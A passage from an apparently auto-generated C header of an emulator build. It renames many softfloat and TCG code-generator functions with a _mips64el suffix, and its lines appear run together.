uint64_to_float16_scalbn_mips64el #define uint32_to_float16_scalbn uint32_to_float16_scalbn_mips64el #define uint16_to_float16_scalbn uint16_to_float16_scalbn_mips64el #define uint64_to_float16 uint64_to_float16_mips64el #define uint32_to_float16 uint32_to_float16_mips64el #define uint16_to_float16 uint16_to_float16_mips64el #define uint64_to_float32_scalbn uint64_to_float32_scalbn_mips64el #define uint32_to_float32_scalbn uint32_to_float32_scalbn_mips64el #define uint16_to_float32_scalbn uint16_to_float32_scalbn_mips64el #define uint64_to_float32 uint64_to_float32_mips64el #define uint32_to_float32 uint32_to_float32_mips64el #define uint16_to_float32 uint16_to_float32_mips64el #define uint64_to_float64_scalbn uint64_to_float64_scalbn_mips64el #define uint32_to_float64_scalbn uint32_to_float64_scalbn_mips64el #define uint16_to_float64_scalbn uint16_to_float64_scalbn_mips64el #define uint64_to_float64 uint64_to_float64_mips64el #define uint32_to_float64 uint32_to_float64_mips64el #define uint16_to_float64 uint16_to_float64_mips64el #define float16_min float16_min_mips64el #define float16_minnum float16_minnum_mips64el #define float16_minnummag float16_minnummag_mips64el #define float16_max float16_max_mips64el #define float16_maxnum float16_maxnum_mips64el #define float16_maxnummag float16_maxnummag_mips64el #define float32_min float32_min_mips64el #define float32_minnum float32_minnum_mips64el #define float32_minnummag float32_minnummag_mips64el #define float32_max float32_max_mips64el #define float32_maxnum float32_maxnum_mips64el #define float32_maxnummag float32_maxnummag_mips64el #define float64_min float64_min_mips64el #define float64_minnum float64_minnum_mips64el #define float64_minnummag float64_minnummag_mips64el #define float64_max float64_max_mips64el #define float64_maxnum float64_maxnum_mips64el #define float64_maxnummag float64_maxnummag_mips64el #define float16_compare float16_compare_mips64el #define float16_compare_quiet float16_compare_quiet_mips64el #define float32_compare float32_compare_mips64el #define float32_compare_quiet float32_compare_quiet_mips64el #define float64_compare float64_compare_mips64el #define float64_compare_quiet float64_compare_quiet_mips64el #define float16_scalbn float16_scalbn_mips64el #define float32_scalbn float32_scalbn_mips64el #define float64_scalbn float64_scalbn_mips64el #define float16_sqrt float16_sqrt_mips64el #define float32_sqrt float32_sqrt_mips64el #define float64_sqrt float64_sqrt_mips64el #define float16_default_nan float16_default_nan_mips64el #define float32_default_nan float32_default_nan_mips64el #define float64_default_nan float64_default_nan_mips64el #define float128_default_nan float128_default_nan_mips64el #define float16_silence_nan float16_silence_nan_mips64el #define float32_silence_nan float32_silence_nan_mips64el #define float64_silence_nan float64_silence_nan_mips64el #define float16_squash_input_denormal float16_squash_input_denormal_mips64el #define float32_squash_input_denormal float32_squash_input_denormal_mips64el #define float64_squash_input_denormal float64_squash_input_denormal_mips64el #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mips64el #define roundAndPackFloatx80 roundAndPackFloatx80_mips64el #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mips64el #define int32_to_floatx80 int32_to_floatx80_mips64el #define int32_to_float128 int32_to_float128_mips64el #define int64_to_floatx80 int64_to_floatx80_mips64el #define int64_to_float128 int64_to_float128_mips64el #define uint64_to_float128 uint64_to_float128_mips64el #define float32_to_floatx80 float32_to_floatx80_mips64el #define float32_to_float128 float32_to_float128_mips64el #define float32_rem float32_rem_mips64el #define float32_exp2 float32_exp2_mips64el #define float32_log2 float32_log2_mips64el #define float32_eq float32_eq_mips64el #define float32_le float32_le_mips64el #define float32_lt float32_lt_mips64el #define float32_unordered float32_unordered_mips64el #define float32_eq_quiet float32_eq_quiet_mips64el #define float32_le_quiet float32_le_quiet_mips64el #define float32_lt_quiet float32_lt_quiet_mips64el #define float32_unordered_quiet float32_unordered_quiet_mips64el #define float64_to_floatx80 float64_to_floatx80_mips64el #define float64_to_float128 float64_to_float128_mips64el #define float64_rem float64_rem_mips64el #define float64_log2 float64_log2_mips64el #define float64_eq float64_eq_mips64el #define float64_le float64_le_mips64el #define float64_lt float64_lt_mips64el #define float64_unordered float64_unordered_mips64el #define float64_eq_quiet float64_eq_quiet_mips64el #define float64_le_quiet float64_le_quiet_mips64el #define float64_lt_quiet float64_lt_quiet_mips64el #define float64_unordered_quiet float64_unordered_quiet_mips64el #define floatx80_to_int32 floatx80_to_int32_mips64el #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mips64el #define floatx80_to_int64 floatx80_to_int64_mips64el #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mips64el #define floatx80_to_float32 floatx80_to_float32_mips64el #define floatx80_to_float64 floatx80_to_float64_mips64el #define floatx80_to_float128 floatx80_to_float128_mips64el #define floatx80_round floatx80_round_mips64el #define floatx80_round_to_int floatx80_round_to_int_mips64el #define floatx80_add floatx80_add_mips64el #define floatx80_sub floatx80_sub_mips64el #define floatx80_mul floatx80_mul_mips64el #define floatx80_div floatx80_div_mips64el #define floatx80_rem floatx80_rem_mips64el #define floatx80_sqrt floatx80_sqrt_mips64el #define floatx80_eq floatx80_eq_mips64el #define floatx80_le floatx80_le_mips64el #define floatx80_lt floatx80_lt_mips64el #define floatx80_unordered floatx80_unordered_mips64el #define floatx80_eq_quiet floatx80_eq_quiet_mips64el #define floatx80_le_quiet floatx80_le_quiet_mips64el #define floatx80_lt_quiet floatx80_lt_quiet_mips64el #define floatx80_unordered_quiet floatx80_unordered_quiet_mips64el #define float128_to_int32 float128_to_int32_mips64el #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mips64el #define float128_to_int64 float128_to_int64_mips64el #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mips64el #define float128_to_uint64 float128_to_uint64_mips64el #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_mips64el #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_mips64el #define float128_to_uint32 float128_to_uint32_mips64el #define float128_to_float32 float128_to_float32_mips64el #define float128_to_float64 float128_to_float64_mips64el #define float128_to_floatx80 float128_to_floatx80_mips64el #define float128_round_to_int float128_round_to_int_mips64el #define float128_add float128_add_mips64el #define float128_sub float128_sub_mips64el #define float128_mul float128_mul_mips64el #define float128_div float128_div_mips64el #define float128_rem float128_rem_mips64el #define float128_sqrt float128_sqrt_mips64el #define float128_eq float128_eq_mips64el #define float128_le float128_le_mips64el #define float128_lt float128_lt_mips64el #define float128_unordered float128_unordered_mips64el #define float128_eq_quiet float128_eq_quiet_mips64el #define float128_le_quiet float128_le_quiet_mips64el #define float128_lt_quiet float128_lt_quiet_mips64el #define float128_unordered_quiet float128_unordered_quiet_mips64el #define floatx80_compare floatx80_compare_mips64el #define floatx80_compare_quiet floatx80_compare_quiet_mips64el #define float128_compare float128_compare_mips64el #define float128_compare_quiet float128_compare_quiet_mips64el #define floatx80_scalbn floatx80_scalbn_mips64el #define float128_scalbn float128_scalbn_mips64el #define softfloat_init softfloat_init_mips64el #define tcg_optimize tcg_optimize_mips64el #define gen_new_label gen_new_label_mips64el #define tcg_can_emit_vec_op tcg_can_emit_vec_op_mips64el #define tcg_expand_vec_op tcg_expand_vec_op_mips64el #define tcg_register_jit tcg_register_jit_mips64el #define tcg_tb_insert tcg_tb_insert_mips64el #define tcg_tb_remove tcg_tb_remove_mips64el #define tcg_tb_lookup tcg_tb_lookup_mips64el #define tcg_tb_foreach tcg_tb_foreach_mips64el #define tcg_nb_tbs tcg_nb_tbs_mips64el #define tcg_region_reset_all tcg_region_reset_all_mips64el #define tcg_region_init tcg_region_init_mips64el #define tcg_code_size tcg_code_size_mips64el #define tcg_code_capacity tcg_code_capacity_mips64el #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_mips64el #define tcg_malloc_internal tcg_malloc_internal_mips64el #define tcg_pool_reset tcg_pool_reset_mips64el #define tcg_context_init tcg_context_init_mips64el #define tcg_tb_alloc tcg_tb_alloc_mips64el #define tcg_prologue_init tcg_prologue_init_mips64el #define tcg_func_start tcg_func_start_mips64el #define tcg_set_frame tcg_set_frame_mips64el #define tcg_global_mem_new_internal tcg_global_mem_new_internal_mips64el #define tcg_temp_new_internal tcg_temp_new_internal_mips64el #define tcg_temp_new_vec tcg_temp_new_vec_mips64el #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_mips64el #define tcg_temp_free_internal tcg_temp_free_internal_mips64el #define tcg_const_i32 tcg_const_i32_mips64el #define tcg_const_i64 tcg_const_i64_mips64el #define tcg_const_local_i32 tcg_const_local_i32_mips64el #define tcg_const_local_i64 tcg_const_local_i64_mips64el #define tcg_op_supported tcg_op_supported_mips64el #define tcg_gen_callN tcg_gen_callN_mips64el #define tcg_op_remove tcg_op_remove_mips64el #define tcg_emit_op tcg_emit_op_mips64el #define tcg_op_insert_before tcg_op_insert_before_mips64el #define tcg_op_insert_after tcg_op_insert_after_mips64el #define tcg_cpu_exec_time tcg_cpu_exec_time_mips64el #define tcg_gen_code tcg_gen_code_mips64el #define tcg_gen_op1 tcg_gen_op1_mips64el #define tcg_gen_op2 tcg_gen_op2_mips64el #define tcg_gen_op3 tcg_gen_op3_mips64el #define tcg_gen_op4 tcg_gen_op4_mips64el #define tcg_gen_op5 tcg_gen_op5_mips64el #define tcg_gen_op6 tcg_gen_op6_mips64el #define tcg_gen_mb tcg_gen_mb_mips64el #define tcg_gen_addi_i32 tcg_gen_addi_i32_mips64el #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_mips64el #define tcg_gen_subi_i32 tcg_gen_subi_i32_mips64el #define tcg_gen_andi_i32 tcg_gen_andi_i32_mips64el #define tcg_gen_ori_i32 tcg_gen_ori_i32_mips64el #define tcg_gen_xori_i32 tcg_gen_xori_i32_mips64el #define tcg_gen_shli_i32 tcg_gen_shli_i32_mips64el #define tcg_gen_shri_i32 tcg_gen_shri_i32_mips64el #define tcg_gen_sari_i32 tcg_gen_sari_i32_mips64el #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mips64el #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mips64el #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mips64el #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_mips64el #define tcg_gen_muli_i32 tcg_gen_muli_i32_mips64el #define tcg_gen_div_i32 tcg_gen_div_i32_mips64el #define tcg_gen_rem_i32 tcg_gen_rem_i32_mips64el #define tcg_gen_divu_i32 tcg_gen_divu_i32_mips64el #define tcg_gen_remu_i32 tcg_gen_remu_i32_mips64el #define tcg_gen_andc_i32 tcg_gen_andc_i32_mips64el #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_mips64el #define tcg_gen_nand_i32 tcg_gen_nand_i32_mips64el #define tcg_gen_nor_i32 tcg_gen_nor_i32_mips64el #define tcg_gen_orc_i32 tcg_gen_orc_i32_mips64el #define tcg_gen_clz_i32 tcg_gen_clz_i32_mips64el #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_mips64el #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_mips64el #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_mips64el #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_mips64el #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_mips64el #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mips64el #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mips64el #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mips64el #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mips64el #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mips64el #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_mips64el #define tcg_gen_extract_i32 tcg_gen_extract_i32_mips64el #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_mips64el #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_mips64el #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mips64el #define tcg_gen_add2_i32 tcg_gen_add2_i32_mips64el #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_mips64el #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mips64el #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mips64el #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_mips64el #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mips64el #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mips64el #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mips64el #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mips64el #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mips64el #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mips64el #define tcg_gen_smin_i32 tcg_gen_smin_i32_mips64el #define tcg_gen_umin_i32 tcg_gen_umin_i32_mips64el #define tcg_gen_smax_i32 tcg_gen_smax_i32_mips64el #define tcg_gen_umax_i32 tcg_gen_umax_i32_mips64el #define tcg_gen_abs_i32 tcg_gen_abs_i32_mips64el #define tcg_gen_addi_i64 tcg_gen_addi_i64_mips64el #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_mips64el #define tcg_gen_subi_i64 tcg_gen_subi_i64_mips64el #define tcg_gen_andi_i64 tcg_gen_andi_i64_mips64el #define tcg_gen_ori_i64 tcg_gen_ori_i64_mips64el #define tcg_gen_xori_i64 tcg_gen_xori_i64_mips64el #define tcg_gen_shli_i64 tcg_gen_shli_i64_mips64el #define tcg_gen_shri_i64 tcg_gen_shri_i64_mips64el #define tcg_gen_sari_i64 tcg_gen_sari_i64_mips64el #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mips64el #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_mips64el #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_mips64el #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_mips64el #define tcg_gen_muli_i64 tcg_gen_muli_i64_mips64el #define tcg_gen_div_i64 tcg_gen_div_i64_mips64el #define tcg_gen_rem_i64 tcg_gen_rem_i64_mips64el #define tcg_gen_divu_i64 tcg_gen_divu_i64_mips64el #define tcg_gen_remu_i64 tcg_gen_remu_i64_mips64el #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_mips64el #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_mips64el #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mips64el #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_mips64el #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_mips64el #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mips64el #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_mips64el #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_mips64el #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_mips64el #define tcg_gen_not_i64 tcg_gen_not_i64_mips64el #define tcg_gen_andc_i64 tcg_gen_andc_i64_mips64el #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_mips64el #define tcg_gen_nand_i64 tcg_gen_nand_i64_mips64el #define tcg_gen_nor_i64 tcg_gen_nor_i64_mips64el #define tcg_gen_orc_i64 tcg_gen_orc_i64_mips64el #define tcg_gen_clz_i64 tcg_gen_clz_i64_mips64el #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_mips64el #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_mips64el #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_mips64el #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_mips64el #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_mips64el #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_mips64el #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_mips64el #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_mips64el #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_mips64el #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_mips64el #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_mips64el #define tcg_gen_extract_i64 tcg_gen_extract_i64_mips64el #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_mips64el #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_mips64el #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mips64el #define tcg_gen_add2_i64 tcg_gen_add2_i64_mips64el #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_mips64el #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_mips64el #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_mips64el #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_mips64el #define tcg_gen_smin_i64 tcg_gen_smin_i64_mips64el #define tcg_gen_umin_i64 tcg_gen_umin_i64_mips64el #define tcg_gen_smax_i64 tcg_gen_smax_i64_mips64el #define tcg_gen_umax_i64 tcg_gen_umax_i64_mips64el #define tcg_gen_abs_i64 tcg_gen_abs_i64_mips64el #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_mips64el #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_mips64el #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mips64el #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mips64el #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mips64el #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_mips64el #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_mips64el #define tcg_gen_exit_tb tcg_gen_exit_tb_mips64el #define tcg_gen_goto_tb tcg_gen_goto_tb_mips64el #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_mips64el #define check_exit_request check_exit_request_mips64el #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mips64el #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mips64el #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mips64el #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mips64el #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_mips64el #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_mips64el #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_mips64el #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_mips64el #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_mips64el #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_mips64el #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_mips64el #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_mips64el #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_mips64el #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_mips64el #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_mips64el #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_mips64el #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_mips64el #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_mips64el #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_mips64el #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_mips64el #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_mips64el #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_mips64el #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_mips64el #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_mips64el #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_mips64el #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_mips64el #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_mips64el #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_mips64el #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_mips64el #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_mips64el #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_mips64el #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_mips64el #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_mips64el #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_mips64el #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_mips64el #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_mips64el #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_mips64el #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_mips64el #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_mips64el #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_mips64el #define simd_desc simd_desc_mips64el #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_mips64el #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_mips64el #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_mips64el #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_mips64el #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_mips64el #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_mips64el #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_mips64el #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_mips64el #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_mips64el #define tcg_gen_gvec_2 tcg_gen_gvec_2_mips64el #define tcg_gen_gvec_2i tcg_gen_gvec_2i_mips64el #define tcg_gen_gvec_2s tcg_gen_gvec_2s_mips64el #define tcg_gen_gvec_3 tcg_gen_gvec_3_mips64el #define tcg_gen_gvec_3i tcg_gen_gvec_3i_mips64el #define tcg_gen_gvec_4 tcg_gen_gvec_4_mips64el #define tcg_gen_gvec_mov tcg_gen_gvec_mov_mips64el #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_mips64el #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_mips64el #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_mips64el #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_mips64el #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_mips64el #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_mips64el #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_mips64el #define tcg_gen_gvec_not tcg_gen_gvec_not_mips64el #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_mips64el #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_mips64el #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_mips64el #define tcg_gen_gvec_add tcg_gen_gvec_add_mips64el #define tcg_gen_gvec_adds tcg_gen_gvec_adds_mips64el #define tcg_gen_gvec_addi tcg_gen_gvec_addi_mips64el #define tcg_gen_gvec_subs tcg_gen_gvec_subs_mips64el #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_mips64el #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_mips64el #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_mips64el #define tcg_gen_gvec_sub tcg_gen_gvec_sub_mips64el #define tcg_gen_gvec_mul tcg_gen_gvec_mul_mips64el #define tcg_gen_gvec_muls tcg_gen_gvec_muls_mips64el #define tcg_gen_gvec_muli tcg_gen_gvec_muli_mips64el #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_mips64el #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_mips64el #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_mips64el #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_mips64el #define tcg_gen_gvec_smin tcg_gen_gvec_smin_mips64el #define tcg_gen_gvec_umin tcg_gen_gvec_umin_mips64el #define tcg_gen_gvec_smax tcg_gen_gvec_smax_mips64el #define tcg_gen_gvec_umax tcg_gen_gvec_umax_mips64el #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_mips64el #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_mips64el #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_mips64el #define tcg_gen_gvec_neg tcg_gen_gvec_neg_mips64el #define tcg_gen_gvec_abs tcg_gen_gvec_abs_mips64el #define tcg_gen_gvec_and tcg_gen_gvec_and_mips64el #define tcg_gen_gvec_or tcg_gen_gvec_or_mips64el #define tcg_gen_gvec_xor tcg_gen_gvec_xor_mips64el #define tcg_gen_gvec_andc tcg_gen_gvec_andc_mips64el #define tcg_gen_gvec_orc tcg_gen_gvec_orc_mips64el #define tcg_gen_gvec_nand tcg_gen_gvec_nand_mips64el #define tcg_gen_gvec_nor tcg_gen_gvec_nor_mips64el #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_mips64el #define tcg_gen_gvec_ands tcg_gen_gvec_ands_mips64el #define tcg_gen_gvec_andi tcg_gen_gvec_andi_mips64el #define tcg_gen_gvec_xors tcg_gen_gvec_xors_mips64el #define tcg_gen_gvec_xori tcg_gen_gvec_xori_mips64el #define tcg_gen_gvec_ors tcg_gen_gvec_ors_mips64el #define tcg_gen_gvec_ori tcg_gen_gvec_ori_mips64el #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_mips64el #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_mips64el #define tcg_gen_gvec_shli tcg_gen_gvec_shli_mips64el #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_mips64el #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_mips64el #define tcg_gen_gvec_shri tcg_gen_gvec_shri_mips64el #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_mips64el #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_mips64el #define tcg_gen_gvec_sari tcg_gen_gvec_sari_mips64el #define tcg_gen_gvec_shls tcg_gen_gvec_shls_mips64el #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_mips64el #define tcg_gen_gvec_sars tcg_gen_gvec_sars_mips64el #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_mips64el #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_mips64el #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_mips64el #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_mips64el #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_mips64el #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_mips64el #define vec_gen_2 vec_gen_2_mips64el #define vec_gen_3 vec_gen_3_mips64el #define vec_gen_4 vec_gen_4_mips64el #define tcg_gen_mov_vec tcg_gen_mov_vec_mips64el #define tcg_const_zeros_vec tcg_const_zeros_vec_mips64el #define tcg_const_ones_vec tcg_const_ones_vec_mips64el #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_mips64el #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_mips64el #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_mips64el #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_mips64el #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_mips64el #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_mips64el #define tcg_gen_dupi_vec tcg_gen_dupi_vec_mips64el #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_mips64el #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_mips64el #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_mips64el #define tcg_gen_ld_vec tcg_gen_ld_vec_mips64el #define tcg_gen_st_vec tcg_gen_st_vec_mips64el #define tcg_gen_stl_vec tcg_gen_stl_vec_mips64el #define tcg_gen_and_vec tcg_gen_and_vec_mips64el #define tcg_gen_or_vec tcg_gen_or_vec_mips64el #define tcg_gen_xor_vec tcg_gen_xor_vec_mips64el #define tcg_gen_andc_vec tcg_gen_andc_vec_mips64el #define tcg_gen_orc_vec tcg_gen_orc_vec_mips64el #define tcg_gen_nand_vec tcg_gen_nand_vec_mips64el #define tcg_gen_nor_vec tcg_gen_nor_vec_mips64el #define tcg_gen_eqv_vec tcg_gen_eqv_vec_mips64el #define tcg_gen_not_vec tcg_gen_not_vec_mips64el #define tcg_gen_neg_vec tcg_gen_neg_vec_mips64el #define tcg_gen_abs_vec tcg_gen_abs_vec_mips64el #define tcg_gen_shli_vec tcg_gen_shli_vec_mips64el #define tcg_gen_shri_vec tcg_gen_shri_vec_mips64el #define tcg_gen_sari_vec tcg_gen_sari_vec_mips64el #define tcg_gen_cmp_vec tcg_gen_cmp_vec_mips64el #define tcg_gen_add_vec tcg_gen_add_vec_mips64el #define tcg_gen_sub_vec tcg_gen_sub_vec_mips64el #define tcg_gen_mul_vec tcg_gen_mul_vec_mips64el #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_mips64el #define tcg_gen_usadd_vec tcg_gen_usadd_vec_mips64el #define tcg_gen_sssub_vec tcg_gen_sssub_vec_mips64el #define tcg_gen_ussub_vec tcg_gen_ussub_vec_mips64el #define tcg_gen_smin_vec tcg_gen_smin_vec_mips64el #define tcg_gen_umin_vec 